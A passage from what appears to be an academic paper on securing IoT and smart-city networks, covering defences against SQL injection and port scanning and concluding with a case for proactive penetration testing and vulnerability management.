    Prepared Statement (With Parameterized Queries): Companies and users should prepare statements with parameterized queries. They should first define all the SQL code and then pass in each parameter to the following queries. This allows the database to distinguish between code and data, regardless of what user input is supplied. Prepared statements ensure that the intent of the query cannot be changed by the attacker, even if they insert SQL commands.

  3. iii.

    Firewall: Companies and users should use either software-based or hardware-based web application firewall to filter out malicious data. A good web application firewall contains a comprehensive set of default rules, and it is easy to add a new one. One of the examples of a web application firewall is open-source module ModSecurity, which is available for Apache, Microsoft IIS, and Nginx web servers. A sophisticated set of rules is provided by ModSecurity to filter the possible dangerous web request. Most attempts to sneak SQL through web channels can be caught by it.

We cannot stop a port scan since the port scan is just simply scanning ports, but not connecting to systems. The port scan is not an intrusion, but oppositely, it could be a valid communication attempt. However, Companies and users should focus on monitoring the traffic flowing over the network and observes the incoming source traffic to the same destination but using different port numbers. Once the targeted source has been identified, the firewall should block the source IP address. They should implement rules that will deny the traffic from a harmful and unknown origin.

15 Conclusion

The world of IT expands quickly and gives humanity many advantages and flexibilities vice versa. There are a growing number of risks and weaknesses and a massive risk for any sector and making a lot of losses to business and societies. Therefore, in IoT and Smart Cities networks penetrate testing should be performed to inspect systems, networks and application vulnerabilities using free tools or by professional depending on their infrastructure and resources before they are hacked. Attacks are often related to SQL injections, spamming and cross-site scripting. Therefore, respective bodies and organization should monitor their network traffic and block unknown or suspicious data, ports and briefly inform workers and clients. Kali is one of the best and free tools that offer users several possibilities for testing in depth. A proactive approach to information security is required in the modern world to prevent possible security infringements. It is also very important to access own system vulnerabilities and loophole before hackers find them out to hack the website or network. That is because a breach of security and the resulting data loss costs a huge amount of money and causes the business credibility loss as well. Consequently, it is worth for businesses to spend heavily on securing their precious properties. Indeed, the assessment of a vulnerability management system is based on the following fundamental elements such as defining the degree of vulnerability, by using information from the assessment tools or software to assess the potential loss or exploit level, analyse data sensitivity, pay more attention to sensitive information assets such as credit card database, etc. Concerning confidentiality, three stages of knowledge may be observed, public, internal, and highly sensitive. Scrutinise existing control and policies timely, basis it should be in practice to keep upgrading and monitor the existing control health and resistance again latest attacks.

In response, business insiders and prospective city developers agree that certain protection concerns need to be resolved. Contrary to typical protection concerns in the past, the data security standards of intelligent cities are modern and are continually evolving around the emerging technologies and creativity developments. Safety specialists will be better advised to look at some of the strategies already presented to recognize the risky environment that might plague smart cities in the future.